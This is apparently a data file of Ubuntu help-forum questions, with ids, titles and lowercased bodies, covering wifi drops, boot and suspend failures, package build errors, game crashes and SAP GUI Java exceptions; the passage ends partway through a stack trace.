312280	were is the c drive in ubuntu 13.04 ?	i have been having issues with my wifi and a friend told me that if i copy the c drive to a memory stick and boot my system from it i can reinstall ubuntu 13.04 ( which is what i have ) . is this true ? if so where is the c drive ? also i did a system test and under wifi it says that i am missing packages ( does n't say which one/s ) . i have done updates and all that include updating through terminal , and the wifi is still not working properly , one minute its fine the next it refuses to work , so i am trying to reinstall and see if that fixes the problem . i am using dell inspiron mini 10 . i also have a red triangle at the top of my screen that says , the update information is outdated . this may be caused by network problems or by a repository that is no longer active . please update manually by selecting show updates from the indicator menu , and watching for failing repositories i have updated but this still shows up and the wireless still fails to work unexpectedly ( 1 minute its fine , the next its not ) . the red triangle aslo takes time to show up after turning on laptop and usually shows up after 2 hours of the laptop being on .
312287	upgrading virtualbox on ubuntu	i want to upgrade virtual box on my ubuntu server 12.04 box . the original version is 4.1 and the latest is 4.2. dpkg reports that i need to uninstall the old version to install the new one . will i lose any data in this process ?
312291	ubuntu not waking from suspend	i 'm running ubuntu 12.04 ( not wubi , usb install ) alongside windows 7 on my toshiba satellite laptop series l655d-s5050 i have a couple of issues , ubuntu will not wake from suspend when closing the lid . it will show the ubuntu screen then go to black and spit out some quick text before the screen will just flicker , as if trying to wake up . i 've been googling around looking for a fix but nothing seems to help . maybe it has something to do with the drivers ? i checked additional drivers in the system settings , but it says there are no drivers present . any ideas ? also , this issue is n't present all the time . but sometimes when i go to shutdown or restart ubuntu , it will just loops to the login screen . thank you , for any input or help ! also i can get some logs of these issues , but not really sure how to go about all of that . i 'm not to familiar with ubuntu , as i 've only been using the desktop version for a couple months now .
312293	mumble overlay in team fortress 2	i 've tried almost everything to let tf2 not crash but work.. someone gut a working idea ?
312294	once installed geos library ( c++ , and c ) , and then trying to install rgeos package ( r ) , it reports geos-config missing !	knowing that the package rgeos , from the r language , requieres a prior installation of geos libraries , i installed , both , libgeos and libgeos-c1 ( 3.2.2 ) , using the synaptic installer in my ubuntu 12.04 ( 32 bit ) machine . then i tried to install rgeos directly from the r console , and it issued a message in the sense that geos-config was not found . the output is as follows : > install.packages ( `` rgeos '' ) installing package ( s ) into ‘/home/checo/r/i486-pc-linux-gnu-library/2.15’ ( as ‘lib’ is unspecified ) also installing the dependency ‘sp’ probando la url 'http : //cran.rstudio.com/src/contrib/sp_1.0-9.tar.gz' content type 'application/x-gzip ' length 882102 bytes ( 861 kb ) url abierta ================================================== downloaded 861 kb probando la url 'http : //cran.rstudio.com/src/contrib/rgeos_0.2-19.tar.gz' content type 'application/x-gzip ' length 221471 bytes ( 216 kb ) url abierta ================================================== downloaded 216 kb * installing *source* package ‘sp’ ... ** package ‘sp’ successfully unpacked and md5 sums checked ** libs gcc -std=gnu99 -i/usr/share/r/include -dndebug -fpic -o3 -pipe -g -c r centroid.c -o rcentroid.o gcc -std=gnu99 -i/usr/share/r/include -dndebug -fpic -o3 -pipe -g -c gcdist.c -o gcdist.o gcc -std=gnu99 -i/usr/share/r/include -dndebug -fpic -o3 -pipe -g -c init.c -o init.o gcc -std=gnu99 -i/usr/share/r/include -dndebug -fpic -o3 -pipe -g -c pip.c -o pip.o gcc -std=gnu99 -i/usr/share/r/include -dndebug -fpic -o3 -pipe -g -c pip2.c -o pip2.o gcc -std=gnu99 -i/usr/share/r/include -dndebug -fpic -o3 -pipe -g -c sp_xports.c -o sp_xports.o gcc -std=gnu99 -i/usr/share/r/include -dndebug -fpic -o3 -pipe -g -c surfacearea.c -o surfacearea.o gcc -std=gnu99 -i/usr/share/r/include -dndebug -fpic -o3 -pipe -g -c zerodist.c -o zerodist.o gcc -std=gnu99 -shared -o sp.so rcentroid.o gcdist.o init.o pip.o pip2.o sp_xports.o surfacearea.o zerodist.o -l/usr/lib/r/lib -lr installing to /home/checo/r/i486-pc-linux-gnu-library/2.15/sp/libs ** r ** data ** demo ** inst ** preparing package for lazy loading ** help *** installing help indices ** building package indices ** installing vignettes ‘intro_sp.rnw’ ‘over.rnw’ ** testing if installed package can be loaded * done ( sp ) * installing *source* package ‘rgeos’ ... ** package ‘rgeos’ successfully unpacked and md5 sums checked configure : cc : gcc -std=gnu99 configure : cxx : g++ configure : rgeos : 0.2-17 checking for /usr/bin/svnversion ... no configure : svn revision : 394 checking geos-config usability ... ./configure : line 1385 : geos-config : command not found no configure : error : geos-config not usable error : configuration failed for package ‘rgeos’ * removing ‘/home/checo/r/i486-pc-linux-gnu-library/2.15/rgeos’ warning in install.packages : installation of package ‘rgeos’ had non-zero exit status forgive my ignorance , but i do n't know where this file , `` geos-config '' , comes from : should it be generated by the gcc compilations above , or should it be previously installed when the libgeos libraries were intalled ? i learnt , from another machine , that `` geos-config '' is an executable and that it should be installed in /usr/bin . do you have any idea on what 's wrong with my procedure ? thanks , -sergio .
312295	how can i fix a shaky touchpad cursor in ubuntu on my hp pavilion laptop ?	i recently installed ubuntu 12.04 on my laptop and it works great , except after the initial reboot my touchpad cursor shakes violently when i hold my finger completely still on the pad.it works fine with a regular mouse plugged in . i could n't find much scouting around the internet except that it might be that my touchpad does n't have any dead zones ? i am very new to ubuntu and am fairly computer savvy , but i do n't know a lot about using the terminal or anything like that , so if you could dumb down a fix for this as much as possible for me , i 'd greatly appreciate it .
312296	i deleted the ubuntu partition from windows 7 , now i ca n't access windows	i deleted the partition containing ubuntu from my computer -- manage -- disk management and now my laptop is showing : error : no such partition . grub rescue > 3 please tell me how can i open my regular windows 7 now .
312297	how i do view c drive ?	i run 12.04 lts on a hp pavillion notebook with 250gb gb hdd . i recently found an emutlaor and noticed something weird . i had a z : drive and c : drive . the c : drive is the same as it was in windows . my vista installation went belly up and got a bsod at loading the os . is it possible to access these folders to see if i can recover anything ?
312299	downloading ubuntu to computer with no os	i recently got back my computer from a hard drive breakdown . i got back the computer with everything except an operating system . i was hoping to be able to download ubuntu to at least have an operating system , but after burning ubuntu to a dvd , my computer will not recognize an operating system on the dvd . what do i need to do differently/add to the dvd to make things work ?
312304	memtest86+ options are missing in grub menu	i had the same problem as @ coversnail here : how can i add the memtest86+ options back to the grub menu ? the problem is : i just can choose between older kernel versions and the actual ubuntu version in grub . there are no other options . i want to run memtest . it is installed and in /etc/grub.d/ , but it is not in grub itself . i am kind of confused .
312305	how come service -- staus-all outputs a non-existing service ?	when i run sudo service -- status-all it outputs [ ? ] jetty but there is no such service/process running in the system . how do i cleanup this service/process ?
312306	install unetbootin on ubuntu 12.04	i 'm trying to install unetbootin on ubuntu 12.04 lts . i downloaded the executable file from this link and followed the instructions below : if using linux , make the file executable ( using either the command chmod +x ./unetbootin-linux , or going to properties- > permissions and checking `` execute '' ) , then start the application , you will be prompted for your password to grant the application administrative rights , then the main dialog will appear , where you select a distribution and install target ( usb drive or hard disk ) , then reboot when prompted.\ so i typed on my terminal sudo chmod +x unetbootin-linux-584 and tried to execute the binary file with ./unetbootin-linux-584 but got this output : ./unetbootin-linux-584 : error while loading shared libraries : libxrandr.so.2 : can not open shared object file : no such file or directory however when i checked for libraries libxrandr on my system i actually found them $ > locate libxrandr /usr/lib/x86_64-linux-gnu/libxrandr.so.2 /usr/lib/x86_64-linux-gnu/libxrandr.so.2.2.0 /usr/lib/x86_64-linux-gnu/libxrandr_ltsq.so.2 /usr/lib/x86_64-linux-gnu/libxrandr_ltsq.so.2.2.0 so i really do n't have a clue of what 's the problem and how can i fix it , any ideas ?
312307	failed to build package	i run into a problem trying to build a package . everything is ok except adding icon - i added this to rules file mkdir -p debian/fbmessenger/usr/share/icons/hicolor/48x48/apps cp debian/fbmessenger-facebook.png debian/fbmessenger/usr/share/icons/hicolor/48x48/apps/ and while compiling it gives this annoying error : mkdir -p debian/fbmessenger/usr/share/icons/hicolor/48x48/apps cp debian/fbmessenger-facebook.png debian/fbmessenger/usr/share/icons/hicolor/48x48/apps/ cp : can not stat `debian/fbmessenger-facebook.png ' : no such file or directory it fails to copy icon from debian/ directory but the icon is actually here . any hints how to resolve this error will be great . cheers , fih
312313	problem turning off the computer	i have installed the latest ubuntu version 12.04 lts , and everytime my wife logs on to her account we got problems to shut the computer off.it always returns to a log in promt on my account.then its impossible to turn the computer off other than pressing the power button until it switches off by itself.all the passwords are also a hassle . is there somebody who can help me with this ? best regards geir a
312320	how can i map my logitech gamepad to the keyboard ?	i recently downloaded steam and bought the hl1 bundle , as well as a few other games through steam and desura . i would like to use my logitech f310 instead of the keyboard and mouse , but i ca n't seem to find any application to map those keys to buttons on my gamepad . can anyone help out ?
312322	where is the unofficial toro ( most recent ) version ?	where is the unofficial toro ( most recent ) version ? this dev . preview ( here : https : //www.youtube.com/watch ? v=emlp2p7ibzu ) has almost nothing working .
312328	problem installing ubuntu along side windows on free 3tb hard drive	hi i 'd like to know how to install ubuntu along side windows , my hard drive has 3tb size , but when i installed windows 7 it only allowed me to use 2.2tb , now i want to install ubuntu in my free hard drive space ( does n't even have format ) , i supposed i should use the `` something else '' option but i really do n't know what to do , and i tried `` along side windows '' option and it gave me a message error ( starting sector number , 4294967296 exceeds the msdos-partition-table-imposed maximum of 4294967295 ) motherboard : asus maximus iv // hardrive : western digital caviar green 3tb
312339	can not boot normally , without restarting lightdm ( or gdm )	i had a problem precisely described here : http : //www.webupd8.org/2013/01/ubuntu-lightdm-black-screen-when-using.html , black screen with blinking cursor instead of login screen . i 've switched to gdm using sudo dpkg-reconfigure gdm -- but faced the same problem , now loading process stops on `` red-white ubuntu dots '' ( without activity under this splash ) . and to login , i still need to restart display manager : ctrl+alt+f1 and sudo service gdm restart . how to make ubuntu to boot normally ?
312341	having issues renaming file extensions of multiple files at once through terminal . `` rename '' comm , does not seem to work	i have a lot of video files that are in mixed formats ( .avi , .mkv , .wmv ) that i need to change to `` .mp4 '' . all of the video files are within one main directory , but also flow into sub directories under that as well . i have looked up how to bulk rename file extension , but i just ca n't seem to get it . i am using ubuntu lts 10.04 . i hope that someone can assist . thank you .
312342	netflix issue : firefox ca n't find the server at movies.netflix.com	i 'm new to ubuntu world ... recently , i have installed netflix desktop on my system . but , it is not working ... giving an error `` firefox ca n't find the server at movies.netflix.com. '' .. i have firefox and chrome web browser installed on my system . netflix website is opening on chrome but not on firefox . please help me . thank you
312348	ca n't install ubuntu 13.04	i am trying to install ubuntu 13.04 on a dell mini 10 that is currently running qimo . i want to replace the old operating system entirely . when i turn on the computer and boot from the usb stick it brings up a black screen that says : boot : i have no idea where to go from here . i created the bootable usb stick using universal usb installer . i 've used the same process for installing ubuntu on other machines in the past have never had this issue . thanks in advance for the help . : )
312349	wireless does n't work only at home	for some reason , on 13.04 , wireless does n't work only on my home network . this is only an issue with ubuntu . on my windows boot ( on the same computer ) it works just fine , along with all my other devices . anyone have an idea ?
312356	ca n't run minecraft on ubuntu 12.04 lts	i was trying to run minecraft on my laptop with ubuntu 12.04 lts 64 bit . i have a lenovo ideapad p580 with 7.7 gb and an intel® core™ i7-3520m cpu @ 2.90ghz × 4 processor . under the graphics section of the system overview in ubuntu it says i have none installed . my computer comes with and nvidia geforce graphics card but it isnt recognized . when i start minecraft i get this crash report . -- -- minecraft crash report -- -- // shall we play a game ? time : 24/06/13 7:23 pm description : failed to start game org.lwjgl.lwjglexception : could not init glx at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:52 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:684 ) at org.lwjgl.opengl.display.create ( display.java:854 ) at org.lwjgl.opengl.display.create ( display.java:784 ) at org.lwjgl.opengl.display.create ( display.java:765 ) at net.minecraft.client.minecraft.a ( sourcefile:235 ) at avv.a ( sourcefile:56 ) at net.minecraft.client.minecraft.run ( sourcefile:507 ) at java.lang.thread.run ( thread.java:679 ) a detailed walkthrough of the error , its code path and all known details is as follows : -- system details -- details : minecraft version : 1.5.2 operating system : linux ( amd64 ) version 3.5.0-34-generic java version : 1.6.0_27 , sun microsystems inc. java vm version : openjdk 64-bit server vm ( mixed mode ) , sun microsystems inc. memory : 406175448 bytes ( 387 mb ) / 514523136 bytes ( 490 mb ) up to 1908932608 bytes ( 1820 mb ) jvm flags : 2 total ; -xmx2048m -xms512m aabb pool size : 0 ( 0 bytes ; 0 mb ) allocated , 0 ( 0 bytes ; 0 mb ) used suspicious classes : no suspicious classes found . intcache : cache : 0 , tcache : 0 , allocated : 0 , tallocated : 0 lwjgl : 2.4.2 opengl : ~~error~~ nullpointerexception : null is modded : probably not . jar signature remains and client brand is untouched . type : client ( map_client.txt ) texture pack : default profiler position : n/a ( disabled ) vec3 pool size : ~~error~~ nullpointerexception : null i can run it on different versions of linux such as fedora .
312360	ubuntu freezes while loading desk	my computer always get frozen after logging in my ubuntu account . it happens on every account and even when it loads cinnamon . i have to shut it down by pressing the power button and just then i can use my notebook normally . can anyone please help me ? im new to ubuntu , id ve very thankful with any help .
312363	is it possible to repair boot record on windows vista partition on dual boot ubuntu 12.04.02 lts install ?	i recently successfully installed ubuntu 12.04.02 desktop as a `` side-by-side '' on an emachines et1641-02w pc ; which before had windows vista ; but was no longer bootable , because the boot sector somehow got trashed . after i installed ubuntu i can go to devices/os and i can access all of my docs , pics , videos , music , etc . on the windows vista partition ; but i still ca n't `` boot '' the windows partition . i 've seen several posts regarding recovering boot sectors using the boot-repair app ; but am wondering if this `` boot-repair '' is only for the ubuntu partition . can i use `` boot-repair '' to repair the windows vista boot sector ?
312364	install windows alongwith ubuntu 13.04	i have a laptop with ubuntu 13.04 installed in 500gb hard disk . i want to install windows 8 alongside with it ( dual boot ) . i tried installing 13.04 alongside ( already existing ) windows 8 but failed . so i removed windows 8 and put 13.04 in it . please help me ... ... ..
312366	can someone explain why chromium is difficult to build for ubuntu ?	i hope this question is not regarded as a duplicate of does someone know why the chromium daily package is n't build anymore ? because that question relates to daily builds and not to `` stable '' chromium available from the software center . so what are the technical difficulties that the chromium team is facing ? a very similar question has been asked in default browser follow-up . i would very much to have an updated chromium stable on my system . also , is the problem of building chromium restricted to 32-bit versions ? ( i have a 64-bit cpu but just 4 gb ram and so i 'm staying with 32-bit all the way . ) i 'm asking this partly in the light of the discussions , here for example , about having chromium as the default web browser in future releases .
312373	how can i export emacs documents in 13.04 ?	when i try to export a document from org-mode in emacs , c-x , c-e now results in 'ca n't find library org ' whereas in 10.04 it opened the export dialog allowing me to produce html , pdf etc . from the source org file . searching with google , i found this bug for redhat which looks closely related . the trouble is i do n't know how to get hold of the emacs-el package it talks about in ubuntu in order to try its workaround so i 'm currently stuck .
312378	rebooting problem	after restarting my ubuntu pc , i am getting a dialog window showing `` your system is running in low graphics mode '' and after clicking on 'ok ' , i was prompted with three options 1 . run in low graphics mode for just one session 2 . reconfigure graphics 3 . troubleshoot the error 4 . exit to console login when i troubleshoot the error , its showing the black screen with following lines which i remember : we do not own /var/log/pm-powersave.log ... ... ... ... ... ... ... ... ... ... ... ... ... could n't write bytes : broken pipe ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... starting system v runlevel compatibility got strucked at this point . actually before restarting , i have changed the owner for all the files under the directory `` /var/log '' and `` /var/lib '' . is there any relation with the above issue . please help me out to resolve the issue . its urgent .
312380	how can i tell how a panel item was set up	i need to do some major surgery on a user account that has somehow sustained configuration damage to the point window decorations are gone , some apps do n't listen to the keyboard , etc etc . i run xfce4 sessions . there 's a panel on the top of the screen that has applications that i put there once upon a time . i know how to do that , sort of . but i do n't remember the details of what i specified . and i 'm unaware of an app for the panel that 's like the menu editor that lets you see and manipulate an item that 's already there . i want to do that because i want to re-do this stuff in a different account . or possibly do a dotfile transplant on this account and re-edit to include the stuff i 'm used to .
312386	is this a viable legitimate way to circumvent nsa spying on me ?	if i set up my own email server in my basement using ubuntu along with my own domain , own smtp server , hosted the emails in my machine , ran a pretty wicked good firewall , would that circumvent spying on my email ? more info : 1 i realize once the email gets replied to outside of my environment that it loses any safeguards i could set up . i 'm not concerned about this . i 'm more trying to find out if in theory this is possible . for the sake of argument , if it is doable with relative ease , assume i would/will encrypt any protocols if they are n't traditionally encrypted . this includes dns too . correct me if i 'm wrong , but it seems that the spying on americans ( and the world ) seems to be targeted at all the big players we all fall back on use for all our basic communication needs ( apple , google , microsoft , at & t , sprint , etc ) . lets assume this `` prism '' program has taken the entire infrastructure of america 's fiber optics and has large portions of it ( most of which run near the hq of those formally mentioned companies ) . so if i stop using those companies and just run my own email server , is there still a legitimate threat that they could usurp all communication on everyone ? what about the isps ? and does the data being encrypted matter or do they have a way of cracking that too ? no smart remarks . i 'm just trying to figure out how the specific of this works . since 95 % of us use google , apple , microsoft , at & t in one way or another , naturally setting up your own infrastructure would defeat that , right ?
312401	error while running sap for java	i have installed sap 7.3 on ubuntu 12.04 and it was working fine . but from last few days its not working . only splash screen shows and its goes . i have tried to start with terminal then it shows errors . please help # /opt/sapclients/sapgui7.30rev1/bin $ ./guilogon # # # # # # # # # # # # # # # # # # # # # # # # # # # # # error # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 25.06 . 11:42:22.304 error : exception occured : java.lang.classnotfoundexception : com.sap.platin.r3.trace.nativetracehook 25.06 . 11:42:22.304 error : java.lang.classnotfoundexception : com.sap.platin.r3.trace.nativetracehook 25.06 . 11:42:22.304 error : at java.net.urlclassloader $ 1.run ( urlclassloader.java:366 ) 25.06 . 11:42:22.304 error : at java.net.urlclassloader $ 1.run ( urlclassloader.java:355 ) 25.06 . 11:42:22.304 error : at java.security.accesscontroller.doprivileged ( native method ) 25.06 . 11:42:22.304 error : at java.net.urlclassloader.findclass ( urlclassloader.java:354 ) 25.06 . 11:42:22.304 error : at java.lang.classloader.loadclass ( classloader.java:424 ) 25.06 . 11:42:22.304 error : at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:308 ) 25.06 . 11:42:22.304 error : at java.lang.classloader.loadclass ( classloader.java:357 ) 25.06 . 11:42:22.304 error : at java.lang.class.forname0 ( native method ) 25.06 . 11:42:22.304 error : at java.lang.class.forname ( class.java:270 ) 25.06 . 11:42:22.304 error : at com.sap.platin.micro.dynamic.createclass ( dynamic.java:100 ) 25.06 . 11:42:22.304 error : at com.sap.platin.micro.dynamic.createobject ( dynamic.java:73 ) 25.06 . 11:42:22.304 error : at com.sap.platin.micro.dynamic.createobject ( dynamic.java:57 ) 25.06 . 11:42:22.304 error : at com.sap.platin.base.application.guiapplication. < init > ( guiapplication.java:176 ) 25.06 . 11:42:22.304 error : at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) 25.06 . 11:42:22.304 error : at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) 25.06 . 11:42:22.304 error : at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) 25.06 . 11:42:22.304 error : at java.lang.reflect.constructor.newinstance ( constructor.java:526 ) 25.06 . 11:42:22.304 error : at java.lang.class.newinstance ( class.java:374 ) 25.06 . 11:42:22.304 error : at com.sap.platin.base.automation.guiclassdescriptor.newinstance ( guiclassdescriptor.java:124 ) 25.06 . 11:42:22.304 error : at com.sap.platin.base.automation.guiautomationdispatcher.createobject ( guiautomationdispatcher.java:127 ) 25.06 . 11:42:22.304 error : at com.sap.platin.base.automation.guiautomationdispatcher.createapplication ( guiautomationdispatcher.java:96 ) 25.06 . 11:42:22.304 error : at com.sap.platin.base.application.guiapplication.currentapplication ( guiapplication.java:246 ) 25.06 . 11:42:22.304 error : at com.sap.platin.base.logon.guiimpl.evalcommandline ( guiimpl.java:534 ) 25.06 . 11:42:22.304 error : at com.sap.platin.base.logon.guiimpl. < init > ( guiimpl.java:143 ) 25.06 . 11:42:22.304 error : at com.sap.platin.base.logon.guiimpl.main ( guiimpl.java:793 ) 25.06 . 11:42:22.304 error : at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) 25.06 . 11:42:22.304 error : at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) 25.06 . 11:42:22.304 error : at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) 25.06 . 11:42:22.304 error : at java.lang.reflect.method.invoke ( method.java:606 ) 25.06 . 11:42:22.304 error : at com.sap.platin.micro.microkernel.startapplication ( microkernel.java:334 ) 25.06 . 11:42:22.304 error : at com.sap.platin.micro.microkernel.startapplication ( microkernel.java:173 ) 25.06 . 11:42:22.304 error : at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) 25.06 . 11:42:22.304 error : at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) 25.06 . 11:42:22.304 error : at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) 25.06 . 11:42:22.304 error : at java.lang.reflect.method.invoke ( method.java:606 ) 25.06 . 11:42:22.304 error : at com.sap.platin.micro.dynamic.callmethod ( dynamic.java:127 ) 25.06 . 11:42:22.304 error : at com.sap.platin.gui.main ( gui.java:74 ) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # error # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # error # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 25.06 . 11:42:22.473 error : exception occured : java.lang.classnotfoundexception : com.sap.platin.r3.util.guiiconlist 25.06 . 11:42:22.473 error : java.lang.classnotfoundexception : com.sap.platin.r3.util.guiiconlist 25.06 . 11:42:22.473 error : at java.net.urlclassloader $ 1.run ( urlclassloader.java:366 ) 25.06 . 11:42:22.473 error : at java.net.urlclassloader $ 1.run ( urlclassloader.java:355 ) 25.06 . 11:42:22.473 error : at java.security.accesscontroller.doprivileged ( native method ) 25.06 . 11:42:22.473 error : at java.net.urlclassloader.findclass ( urlclassloader.java:354 ) 25.06 . 11:42:22.473 error : at java.lang.classloader.loadclass ( classloader.java:424 ) 25.06 . 11:42:22.473 error : at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:308 ) 25.06 . 11:42:22.473 error : at java.lang.classloader.loadclass ( classloader.java:357 ) 25.06 . 11:42:22.473 error : at java.lang.class.forname0 ( native method ) 25.06 . 11:42:22.473 error : at java.lang.class.forname ( class.java:270 ) 25.06 . 11:42:22.473 error : at com.sap.platin.micro.dynamic.createclass ( dynamic.java:100 ) 25.06 . 11:42:22.473 error : at com.sap.platin.micro.dynamic.createclass ( dynamic.java:82 ) 25.06 . 11:42:22.473 error : at com.sap.platin.base.util.guibitmapmgr. < clinit > ( guibitmapmgr.java:41 ) 25.06 . 11:42:22.473 error : at com.sap.platin.r3.plaf.basic.basicsapconfigurator.setdefaulticonsimpl ( basicsapconfigurator.java:60 ) 25.06 . 11:42:22.473 error : at com.sap.platin.r3.plaf.basic.basicsapconfigurator.initdefaults ( basicsapconfigurator.java:54 ) 25.06 . 11:42:22.473 error : at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) 25.06 . 11:42:22.473 error : at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) 25.06 . 11:42:22.473 error : at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) 25.06 . 11:42:22.473 error : at java.lang.reflect.method.invoke ( method.java:606 ) 25.06 . 11:42:22.473 error : at com.sap.platin.base.plaf.designlookandfeel.getdefaults ( designlookandfeel.java:309 ) 25.06 . 11:42:22.473 error : at javax.swing.uimanager.setlookandfeel ( uimanager.java:536 ) 25.06 . 11:42:22.473 error : at com.sap.platin.base.logon.guiimpl $ 1.run ( guiimpl.java:104 ) 25.06 . 11:42:22.473 error : at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) 25.06 . 11:42:22.473 error : at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:733 ) 25.06 . 11:42:22.473 error : at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) 25.06 . 11:42:22.473 error : at java.awt.eventqueue $ 3.run ( eventqueue.java:694 ) 25.06 . 11:42:22.473 error : at java.awt.eventqueue $ 3.run ( eventqueue.java:692 ) 25.06 . 11:42:22.473 error : at java.security.accesscontroller.doprivileged ( native method ) 25.06 . 11:42:22.473 error : at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) 25.06 . 11:42:22.473 error : at java.awt.eventqueue.dispatchevent ( eventqueue.java:703 ) 25.06 . 11:42:22.473 error : at com.sap.platin.micro.event.guieventqueue.dispatchevent ( guieventqueue.java:79 ) 25.06 . 11:42:22.473 error : at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) 25.06 . 11:42:22.473 error : at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) 25.06 . 11:42:22.473 error : at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) 25.06 . 11:42:22.473 error : at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) 25.06 . 11:42:22.473 error : at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) 25.06 . 11:42:22.473 error : at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # error # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # error # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 25.06 . 11:42:22.474 error : exception occured : java.lang.nullpointerexception 25.06 . 11:42:22.474 error : java.lang.nullpointerexception 25.06 . 11:42:22.474 error : at com.sap.platin.micro.dynamic.getproperty ( dynamic.java:247 ) 25.06 . 11:42:22.474 error : at com.sap.platin.micro.dynamic.getproperty ( dynamic.java:234 ) 25.06 . 11:42:22.474 error : at com.sap.platin.base.util.guibitmapmgr. < clinit > ( guibitmapmgr.java:41 ) 25.06 . 11:42:22.474 error : at com.sap.platin.r3.plaf.basic.basicsapconfigurator.setdefaulticonsimpl ( basicsapconfigurator.java:60 ) 25.06 . 11:42:22.474 error : at com.sap.platin.r3.plaf.basic.basicsapconfigurator.initdefaults ( basicsapconfigurator.java:54 ) 25.06 . 11:42:22.474 error : at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) 25.06 . 11:42:22.474 error : at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) 25.06 . 11:42:22.474 error : at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) 25.06 . 11:42:22.474 error : at java.lang.reflect.method.invoke ( method.java:606 ) 25.06 . 11:42:22.474 error : at com.sap.platin.base.plaf.designlookandfeel.getdefaults ( designlookandfeel.java:309 ) 25.06 . 11:42:22.474 error : at javax.swing.uimanager.setlookandfeel ( uimanager.java:536 ) 25.06 . 11:42:22.474 error : at com.sap.platin.base.logon.guiimpl $ 1.run ( guiimpl.java:104 ) 25.06 . 11:42:22.474 error : at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) 25.06 . 11:42:22.474 error : at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:733 ) 25.06 . 11:42:22.474 error : at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) 25.06 . 11:42:22.474 error : at java.awt.eventqueue $ 3.run ( eventqueue.java:694 ) 25.06 . 11:42:22.474 error : at java.awt.eventqueue $ 3.run ( eventqueue.java:692 ) 25.06 . 11:42:22.474 error : at java.security.accesscontroller.doprivileged ( native method ) 25.06 . 11:42:22.474 error : at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) 25.06 . 11:42:22.474 error : at java.awt.eventqueue.dispatchevent ( eventqueue.java:703 ) 25.06 . 11:42:22.474 error : at com.sap.platin.micro.event.guieventqueue.dispatchevent ( guieventqueue.java:79 ) 25.06 . 11:42:22.474 error : at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) 25.06 . 11:42:22.474 error : at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) 25.06 . 11:42:22.474 error : at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) 25.06 . 11:42:22.474 error : at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) 25.06 . 11:42:22.474 error : at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) 25.06 . 11:42:22.474 error : at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # error # # # # # # # # # # # # # # # # # # # # # # # # # # # # # java.lang.exceptionininitializererror at com.sap.platin.r3.plaf.basic.basicsapconfigurator.setdefaulticonsimpl ( basicsapconfigurator.java:60 ) at com.sap.platin.r3.plaf.basic.basicsapconfigurator.initdefaults ( basicsapconfigurator.java:54 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at com.sap.platin.base.plaf.designlookandfeel.getdefaults ( designlookandfeel.java:309 ) at javax.swing.uimanager.setlookandfeel ( uimanager.java:536 ) at com.sap.platin.base.logon.guiimpl $ 1.run ( guiimpl.java:104 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:733 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:694 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:692 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 